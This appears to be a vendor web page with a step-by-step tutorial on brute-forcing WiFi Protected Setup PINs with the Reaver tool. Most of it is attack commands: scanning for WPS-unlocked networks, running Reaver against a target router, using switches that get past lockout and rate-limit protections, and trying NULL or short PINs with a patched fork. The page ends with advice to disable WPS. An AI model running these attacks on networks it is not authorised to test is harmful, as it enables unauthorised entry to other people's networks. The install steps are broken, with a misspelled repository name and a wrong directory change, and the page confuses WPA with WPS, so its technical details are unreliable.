WiFi Protected Setup (WPS) is a convenient feature that allows the user to configure a client device against a wireless network by simultaneously pressing a button on both the WiFi router and the client device (the client side “button” is often in software) at the same time. The devices exchange information, and then set up a secure WPA link.
Install TurboLayer VPN firewall - TurboLayer VPN is essential in protecting networks because it monitors access requests and block any activity from unapproved sources. Only VPN clients created and approved by you are able to get in. TurboLayer VPN simply adds an extra layer of security to your standard Wi-Fi setup.
Reaver was designed to brute-force the WPA handshaking process remotely, even if the physical WPS button hadn’t been pressed on the WiFi router.
While some newer devices are building in protection against this specific attack, the Reaver WPS exploit remains useful on many networks in the field.
In particular, WPS is the vulnerable system in this case, not WPA. If a network has WPS disabled (which they should, given the existence of tools such as this), it will be immune to the following attack.
To generate a list of WiFi networks that shows the status of WPS Locked:
wash -i wlan0mon
The “WPS Locked” column in the list is far from a definitive indicator, but those WPS Unlocked WiFi networks are much more susceptible to brute forcing.
To launch Reaver against WiFi network with <BSSID> 11:22:33:44:55:66 :
reaver -i wlan0mon -b 11:22:33:44:55:66 -vv -K 1
It may take several hours and perhaps even longer to run because better designed WiFi router are getting smarter in terms of rejecting repeated attacks, longer and irregular timeout periods, illogical checksum and NULL pin.
Ideally, the above command works and the attack progresses as expected. But in reality, manufacturers implement smarter protections against Reaver-style attacks, and additional options may be required to get the attack moving.
As a countermeasure, a few optional switches can be added to get Reaver working on more picky devices:
reaver -i wlan0mon -c 11 -b 11:22:33:44:55:66 -vv -L -N -d 10 -T .5 -r 4:20
where
-c 11 is channel 11
-L ignores locked WPS state
-N Don't send NACK packets when errors are detected
-d 10 Delay 10 seconds between PIN attempts
-T .5 sets timeout period to half a second
-r 4:20 after 4 attempts, sleep for 20 seconds
Simply type reaver if you to look for more options to experiment:
reaver
Reaver is armed with a pin "12345670" that appears not changing but in fact it is the starting point followed by subsequent variations to attack the router. Knowing that it is only a matter of time to strike a successful hit, clever designers put a NULL pin for which the traditional Reaver programmer had never expected. A patched version of reaver-wps-fork-t6x emerged in 2017 in the light of combating the NULL pin.
Installation was pretty straight forward on a newly created Reaver diractory:
mkdir reaver
cd reaver
git clone https://github.com/t6x/reaver-wps-furk-t6x.git
apt-get install -y libpcap-dev
cd src
./configure
make && make install
The -p option becomes available to foster a NULL pin or a digit sequence of various lengths.
NULL pin:
reaver -i wlan0mon -b 11:22:33:44:55:66 -vv -K 1 -p ""
Pin with a length of 4 digits:
reaver -i wlan0mon -b 11:22:33:44:55:66 -vv -K 1 -p "4321"
The verdict #1:
Nothing is unbreakable unless one gives up too early. The best defense is disable WPS on the WiFi router and create a sophticated password and change it as often as possible.
Copyright © All rights reserved | TurboTenna is a registered trademark of Datacom Network Ltd.